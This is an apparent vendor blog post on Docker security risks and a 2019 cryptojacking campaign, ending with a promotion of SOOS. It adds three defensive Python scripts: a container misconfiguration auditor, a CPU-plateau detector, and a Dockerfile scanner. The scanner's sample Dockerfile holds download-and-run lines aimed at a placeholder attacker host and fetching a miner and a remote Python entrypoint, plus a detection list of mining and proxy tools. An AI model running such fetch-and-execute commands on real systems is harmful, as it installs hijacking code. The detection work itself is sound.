Since 2013, Docker has enabled rapid development and deployment of web applications. With its innovative approach to containers, Docker also pioneered a way to distribute highly secure applications. Nonetheless, security is never perfect. With even the most popular Docker images containing vulnerabilities or malware, a hard look at Docker security issues is a wise move for developers.
Docker Simplifies Web Deployment
The foundation of a Docker application is the container image. This image is an executable package of code, binaries, libraries, and configuration settings. A Docker image is built from stacked collections of instructions, called layers. To create a container image, a developer can begin by pulling a proven base image from Docker Hub, a public image registry. With the base in place, the coder can pull more layers from the hub or add custom-written code. The ability to build powerful applications by stacking layers in this fashion helps explain the popularity of the Docker environment.
All of the layers in a Docker image are read-only, which contributes to their security. Running a container image creates a Docker container, a fully functioning self-contained application. This container runs on a host, and many containers can run simultaneously on the same host. All of the host’s containers share the host’s single Linux kernel.
Docker likens the relationship among these hosted containers to a simple Ethernet network. In such a network, a single switch connects all devices, and for each device a set of permissions governs how it interacts with its network partners. While an individual container is isolated by default, much of the power of Docker hinges on containers communicating with one another. Therefore, developers must exercise extraordinary care when configuring permissions between containers. When coders slip up, a skilled hacker can wreak havoc.
Efficiency Creates an Opportunity for Hackers
Docker was designed to be an evolutionary step beyond virtual machines. With VMs, each virtual machine on a host needs its own complete guest operating system. Docker’s method of hosting applications removes this layer of operating systems and runs containers atop a single Linux OS. By sharing the operating system among the containers on a host, Docker fostered a less resource-intensive deployment model.
Unfortunately, Docker’s approach also brought security consequences. The kernel is the core of an operating system: the code that controls the hardware and every running process. To a hacker, the OS kernel is as valuable as the crown jewels. By removing an OS layer, Docker removed an obstacle between hackers and the all-important kernel and set the stage for devilry.
The Daemon Is in the Details
The Docker daemon on a host listens on a UNIX socket file; that socket is the application programming interface (API) through which all of the host’s containers are created and controlled, and the daemon performs tasks when commanded through it. Some containers, such as tooling that manages other containers, must communicate with this interface, and in programming lingo, establishing this pathway is known as mounting the socket. For a threat actor, gaining access to a container connected to the API and its daemon is highly desirable.
An opportunistic hacker can use a wrongly configured TCP port to gain access to a container. If this container has mounted the UNIX socket, the hacker may gain easy access to the root filesystem of the host. From there, it is a hop, skip, and a jump to the socket file, control of the host, and substantial access to all running containers.
Hackership Has Its Privileges
For a narrow group of Docker users, access to the physical hardware of the host computer or attached devices is necessary. Use cases may include access to network hardware or data from internet-of-things devices. To handle this situation, Docker allows a container to be started with the --privileged flag at runtime. Privileged may be an understatement in this context. With the privileged flag set, a container breaks free of nearly all of Docker’s isolation constraints.
As long as a privileged container remains uncorrupted and sticks to its intended tasks, this status presents no difficulties. If a hacker gains access to a running privileged container, however, catastrophe may result. Possible actions include overwriting hashed security keys, deleting entire disk partitions, or wiping IoT devices. Therefore, with a privileged container, correct port configuration is an existential duty.
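As an added example that is not part of the original article, the following Python script audits the three misconfigurations discussed in the two sections above: a container with the daemon’s UNIX socket mounted, a container started with the privileged flag, and a container port published on every interface. It reads the JSON that `docker inspect` produces; the three container records embedded here are constructed samples whose names, paths and ports are made up, and the script name in the comment is assumed.

```python
import json
import sys

# Constructed sample of `docker inspect` output for three containers. The names,
# paths and ports are made up; only the field layout follows real `docker inspect` JSON.
SAMPLE_INSPECT = json.dumps([
    {
        "Name": "/web",
        "HostConfig": {
            "Privileged": False,
            "Binds": ["/srv/web:/usr/share/nginx/html:ro"],
            "PortBindings": {"80/tcp": [{"HostIp": "127.0.0.1", "HostPort": "8080"}]},
        },
        "Mounts": [{"Type": "bind", "Source": "/srv/web", "Destination": "/usr/share/nginx/html"}],
    },
    {
        "Name": "/ci-runner",
        "HostConfig": {
            "Privileged": False,
            "Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
            "PortBindings": {},
        },
        "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock", "Destination": "/var/run/docker.sock"}],
    },
    {
        "Name": "/iot-gateway",
        "HostConfig": {
            "Privileged": True,
            "Binds": [],
            "PortBindings": {"2375/tcp": [{"HostIp": "0.0.0.0", "HostPort": "2375"}]},
        },
        "Mounts": [],
    },
])

DOCKER_SOCKET = "/var/run/docker.sock"
# An empty HostIp means Docker binds the published port on every interface.
WILDCARD_IPS = {"", "0.0.0.0", "::"}


def audit_container(container):
    """Return (name, kind, detail) findings for one `docker inspect` record."""
    findings = []
    name = container.get("Name", "?").lstrip("/")
    host_cfg = container.get("HostConfig") or {}
    if host_cfg.get("Privileged"):
        findings.append((name, "privileged", "runs with --privileged; nearly all isolation is disabled"))
    # Bind sources appear both in Mounts and, as "src:dst[:opts]", in HostConfig.Binds.
    sources = {m.get("Source") for m in container.get("Mounts") or []}
    sources |= {b.split(":")[0] for b in host_cfg.get("Binds") or []}
    if DOCKER_SOCKET in sources:
        findings.append((name, "docker-socket", DOCKER_SOCKET + " is mounted; the container can drive the daemon"))
    for port, bindings in (host_cfg.get("PortBindings") or {}).items():
        for binding in bindings or []:
            if binding.get("HostIp", "") in WILDCARD_IPS:
                findings.append((name, "exposed-port",
                                 f"{port} published on all interfaces as host port {binding.get('HostPort')}"))
    return findings


def audit(inspect_json):
    """Audit every container record in a `docker inspect` JSON document."""
    findings = []
    for container in json.loads(inspect_json):
        findings.extend(audit_container(container))
    return findings


if __name__ == "__main__":
    # Real use (assumed script name): docker inspect $(docker ps -q) | python3 audit_containers.py
    data = SAMPLE_INSPECT if sys.stdin.isatty() else sys.stdin.read()
    for name, kind, detail in audit(data):
        print(f"[{kind}] {name}: {detail}")
```

Run against the built-in sample, the script reports the socket mount on ci-runner and both the privileged flag and the wildcard port binding on iot-gateway, while web, which binds its port to 127.0.0.1 only, passes. Note that the daemon’s own TCP listener is a daemon setting (for example in daemon.json), not a container setting, so it does not appear in `docker inspect` and must be checked separately.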
Cryptojackers Make Their Move
With a cryptocurrency, mining is the process of adding a new block to the currency’s blockchain. Winning the race to add this new block nets the miner a handsome reward, thus explaining the appeal of mining. Successful crypto mining requires extraordinary levels of computing power, and lawful miners invest hundreds of thousands of dollars in specialized hardware. Crooked miners, known as cryptojackers, merely steal computing power from corporate networks.
A Rude Surprise
As cryptojacking afflicted more and more networks, many corporate IT specialists believed that the isolation features of Docker largely protected their container deployments. In 2019, these professionals learned that they had underestimated the cryptojackers’ ingenuity. The cyber crooks began by seeding a half-dozen malicious images on Docker Hub. Once a victim pulled one of the images and ran it as a container, a five-step process came into play:
- The malware installed the dependent packages needed for the mining application.
- The package then installed Tor on the victim’s host machine. Tor, the onion router, conceals the destination of the hijacked processor cycles.
- The illicit package then installed XMRig, an open-source crypto mining app.
- Next came the establishment of a proxy chain. A proxy is an intermediate computer between the victim’s machine and the criminals’ home base. A proxy chain rotates among different computers so that a broken connection does not end the operation.
- The final step was copying an external Python script to serve as an entry point.
When the cryptojackers remotely triggered the script, the crypto mining application sprang to life. By carefully metering their theft of computer cycles, the cryptojackers operated under the radar of the corporate IT pros. Before the discovery, the malicious images received over two million pulls from the Docker Hub. At least two thousand victims became unwilling members of the cryptojackers’ mining pool.
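The five steps above leave traces in an image’s build instructions, which is where a defender can look before an image ever runs. As an added example that comes neither from the original article nor from the malicious images it describes, the following Python scanner parses a Dockerfile the way the Dockerfile format does (comments dropped, backslash continuation lines joined) and flags RUN instructions that install the tooling named above (Tor, XMRig, proxy-chain software), commands that pipe a download straight into another program, and ENTRYPOINT or CMD instructions that fetch their code from the network at start-up. The embedded Dockerfile is a constructed sample, and `attacker.example` is a placeholder hostname, not a real indicator.

```python
import re

# Tools named in the chain above; tokens of RUN commands are compared against this set.
INDICATOR_TOOLS = {"tor", "xmrig", "proxychains", "proxychains4"}
# A curl/wget command that downloads over HTTP(S).
REMOTE_FETCH = re.compile(r"\b(curl|wget)\b[^|;&]*https?://\S+")
# Separators for shell command lines, including "/" and "." so that path components
# and file stems such as "xmrig.tar.gz" are seen as individual words.
TOKEN_SPLIT = re.compile(r"[\s;&|()='\"/.]+")

# Constructed sample Dockerfile; "attacker.example" is a placeholder, not a real host.
SAMPLE_DOCKERFILE = r"""
FROM ubuntu:20.04
# Build dependencies for the miner
RUN apt-get update && apt-get install -y \
    build-essential libssl-dev \
    tor proxychains
RUN curl -sL http://attacker.example/xmrig.tar.gz | tar xz -C /opt
COPY proxychains.conf /etc/proxychains.conf
ENTRYPOINT ["sh", "-c", "curl -s http://attacker.example/entry.py | python3 -"]
"""


def _instruction(buf):
    parts = buf.strip().split(None, 1)
    return parts[0].upper(), parts[1] if len(parts) > 1 else ""


def parse_dockerfile(text):
    """Return a list of (INSTRUCTION, arguments). Comment and blank lines are dropped and
    a line ending in a backslash is joined with the next one, as the Dockerfile format does."""
    logical, buf = [], ""
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        logical.append(_instruction(buf))
        buf = ""
    if buf.strip():  # unterminated continuation at end of file
        logical.append(_instruction(buf))
    return logical


def scan_dockerfile(text):
    """Return (instruction_number, kind, detail) findings for suspicious instructions."""
    findings = []
    for idx, (instr, args) in enumerate(parse_dockerfile(text), 1):
        if instr == "RUN":
            tokens = set(TOKEN_SPLIT.split(args.lower()))
            hits = sorted(tokens & INDICATOR_TOOLS)
            if hits:
                findings.append((idx, "mining-tooling", "RUN installs or fetches " + ", ".join(hits)))
            if REMOTE_FETCH.search(args) and "|" in args:
                findings.append((idx, "pipe-from-network", "RUN pipes a download straight into another command"))
        elif instr in ("ENTRYPOINT", "CMD") and REMOTE_FETCH.search(args):
            findings.append((idx, "remote-entrypoint", instr + " fetches its code from the network at start-up"))
    return findings


if __name__ == "__main__":
    for number, kind, detail in scan_dockerfile(SAMPLE_DOCKERFILE):
        print(f"instruction {number}: [{kind}] {detail}")
```

On the sample, the scanner flags the second instruction (tor and proxychains), the third instruction twice (xmrig, and a download piped into tar), and the entrypoint that pulls its Python script from the network, which is exactly the final step of the chain described above. Token matching is a heuristic: it will not catch renamed binaries, and the same checks are worth running over the `CREATED BY` column of `docker history` for images whose Dockerfile is not available.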
No Letup in Sight
Compounding the difficulties for corporate Docker users, the success of cryptojackers emboldened other cybercriminals to launch distributed denial-of-service attacks. DDoS attacks use networks of bots to flood a victim’s network with requests, thus paralyzing the service.
How do the crooks gain access? A misconfigured container with an open port and access to an API is the typical avenue of these exploits. Though the 2019 scheme received heavy coverage in the IT press, cryptojacking remains a leading motive for Docker attacks. To the exasperation of cybersecurity pros, this type of malware is difficult to find with conventional scans. Some security specialists believe the best way to detect cryptojacking malware is to begin by closely monitoring hardware for slowdowns or operating temperature increases.
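Watching for slowdowns can be done per container rather than per machine, since `docker stats` reports each container’s CPU share. The following Python script is an added example, not part of the original article: it consumes timestamped samples of `docker stats --no-stream --format "{{.Name}} {{.CPUPerc}}"` and reports containers whose CPU has stayed at or above a threshold for several consecutive samples, which separates a steady mining plateau from a short legitimate spike. The sample lines, container names and timestamps are constructed.

```python
from collections import defaultdict

# Constructed samples: four runs, one minute apart, of
#   docker stats --no-stream --format "{{.Name}} {{.CPUPerc}}"
# with a timestamp prepended to each line. Names and values are made up.
SAMPLE_STATS = """\
2023-01-01T10:00:00Z web 3.10%
2023-01-01T10:00:00Z worker 12.40%
2023-01-01T10:00:00Z ci-runner 1.05%
2023-01-01T10:01:00Z web 2.80%
2023-01-01T10:01:00Z worker 97.90%
2023-01-01T10:01:00Z ci-runner 0.90%
2023-01-01T10:02:00Z web 95.00%
2023-01-01T10:02:00Z worker 98.40%
2023-01-01T10:02:00Z ci-runner 1.20%
2023-01-01T10:03:00Z web 3.00%
2023-01-01T10:03:00Z worker 96.70%
2023-01-01T10:03:00Z ci-runner 1.10%
"""


def parse_stats(text):
    """Yield (timestamp, container, cpu_percent) for each well-formed line, skipping the rest."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 3 or not parts[2].endswith("%"):
            continue
        try:
            cpu = float(parts[2].rstrip("%"))
        except ValueError:
            continue
        yield parts[0], parts[1], cpu


def sustained_high_cpu(text, threshold=90.0, min_samples=3):
    """Return {container: (first_ts, last_ts, mean_cpu)} for containers whose CPU stayed at or
    above `threshold` for at least `min_samples` consecutive samples. A single spike (web at
    10:02 in the sample) is ignored; a plateau (worker from 10:01 on) is reported."""
    series = defaultdict(list)
    for ts, name, cpu in parse_stats(text):
        series[name].append((ts, cpu))
    alerts = {}
    for name, samples in series.items():
        best, run = [], []
        for ts, cpu in samples:
            run = run + [(ts, cpu)] if cpu >= threshold else []  # consecutive high samples
            if len(run) > len(best):
                best = run
        if len(best) >= min_samples:
            mean = round(sum(c for _, c in best) / len(best), 2)
            alerts[name] = (best[0][0], best[-1][0], mean)
    return alerts


if __name__ == "__main__":
    for name, (first, last, mean) in sustained_high_cpu(SAMPLE_STATS).items():
        print(f"{name}: CPU averaged {mean}% from {first} to {last}")
```

In practice the samples come from a cron job that prepends `date -u +%Y-%m-%dT%H:%M:%SZ` to each `docker stats --no-stream` line and appends them to a file; the threshold and window should be tuned to each workload’s normal profile, since a batch job can legitimately hold a core for minutes.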
To head off this misery, Docker urges most users to avoid exposing any APIs to the internet. For the select group of corporate users who must allow access, the recommendation is to place the API behind a virtual private network open only to a narrow group of vetted users. As for slamming the software door on threat actors, a good starting point is the first step in Docker development: image building.
Image Consciousness Pays
The ongoing success of cryptojackers points to a fundamental misunderstanding among many Docker developers. Docker’s encapsulation aids security, but protection is not guaranteed. The Docker documentation features multiple red-outlined warnings on the consequences of misconfiguring ports or neglecting flag settings.
While the environment’s container image building process enables rapid deployment, Docker consistently advises developers to keep their images as lean as possible. A reliably functioning Docker image is not necessarily an optimized image. Beyond enhancing security, lean images aid portability with smaller file sizes and also improve execution speed.
As for the configuration issues that open the door to cyber crooks, developers need to remind themselves that “README” files bear that title for a reason. Containerized software may well be the wave of the future. The developers who slow down and take pains with security are likely to see the most rapid success.
Security Always Matters
As this overview of Docker vulnerabilities demonstrates, programmers can never lower their guard with security. From the moment of deployment, a developer’s reputation is on the line, and that means security is not an option. To help with this essential mission, developers have SOOS. Shouldering the burden of software composition analysis, SOOS scans every component of every project for nearly 150,000 vulnerabilities. The SOOS dashboard then lets developers quickly size up issues and prioritize problem areas for eradication.
Close on the heels of security is the need for license compliance. A SOOS scan reveals the license status of every package and dependency. SOOS integrates smoothly with a host of tools and frameworks, eliminating migration hassles. For security, compliance, and governance, SOOS is the total SCA solution.